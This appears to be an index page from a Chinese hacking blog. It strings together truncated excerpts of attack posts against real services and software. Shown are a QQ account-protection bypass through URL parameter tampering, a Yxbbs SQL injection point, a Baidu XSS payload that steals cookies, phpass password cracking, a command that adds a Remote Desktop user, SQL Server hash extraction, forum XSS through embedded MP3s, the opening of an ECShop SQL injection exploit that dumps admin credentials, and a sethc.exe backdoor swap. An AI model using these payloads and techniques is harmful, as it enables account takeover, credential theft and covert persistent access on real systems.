二代保又出大bug，可以不需要验证二代保直接秒上手机保护，然后用手机保护修改二代保！！ZYFREE.NET声明，改咨询来自IM论坛

登录后看到“修改密保资料”，“修改密保手机”，“通过原密保手机修改”，
然后在 https://account.qq.com/cgi-bin/modify/modify_mobile_mobile 地址后加 ?sid=6，
...

Read the rest of this entry »

影响版本: Yxbbs3.0漏洞描述: yxbbs在用户注册时，会实时检测用户名是否已存在以及用户名是否合法，不过服务端在检测时，对用户提交数据检验不够，本来人性化的一个功能，引入了一个注入点。具体涉及文件See.asp，对用户提交的 name = unescape(Request("name")) 并未做任何检验。 测试URL：http://www.yi

测试URL：http://passport.baidu.com/ubrwsbas?u_jump_url=%bf%22;alert(document.cookie);</script>页面输出：<script>document.domain="baidu.com";var spRef = "縗";alert(document.cooki

# Trace: 新版本的WordPress和phpbb已经弃用md5，采用phpass加密了（还有其他一些开源WEB程序）。原来DarkC0de上发布了一个phpass.py，是配合字典破解的，这个Phpass_Crack也是。PasswordsPro官方下载的最新版本也已经支持phpass的破解，有字典攻击和暴力破解等方式可选（选择md5(phpbb3) Modul）。I have writt

当出现这种情况时，输入：net localgroup "Remote Desktop Users" name /add

神秘小强's bloghttp://www.smxiaoqiang.cn/--------------------------------------SQL服务器是怎样储存密码的？SQL服务器使用了一个没有公开的函数pwdencrypt()对用户密码产生一个hash。通过研究我们可以发现这个hash储存在mater数据库的sysxlogins表里面。这个可能已经是众所周知的事情了。pwdencry

我们知道，成熟的论坛系统都在用户提交帖子数据的时候对敏感HTML代码进行了转换、过滤或删除，这样就不能嵌入脚本来实现跨站攻击。但恰恰是成熟的论坛都提供提交多媒体信息，也就是可以嵌入MP3音频文件或者FLASH文件，关于FLASH的跨站这里就不说了，今天主要带大家探讨下MP3的跨站攻击。就拿某个版本的BBSXP为例，让管理员或斑竹神不知鬼不觉的帮你删除任何你想删除的帖子（条件是他要看你的帖子）：首先

去年的是2.5的漏洞，今年的也杀2.6，切忌不要乱入侵！只供参考！EXP:#!/usr/bin/php<?phpprint_r('+---------------------------------------------------------------------------+ECShop <= v2.6.2 SQL injection / admin credentials d

鉴于shift后门已经被管理员开始注意，写出本程序，利用的是高对比这个可以远程调用的辅助工具。左Alt+左Shift+PrintScreen(截屏键，一般位于键盘右上) 。设本程序为ade.exe则运行以下命令即可 copy %systemroot%\system32\sethc.exe %systemroot%\system32\sethc.exe.exe copy ade.exe %syste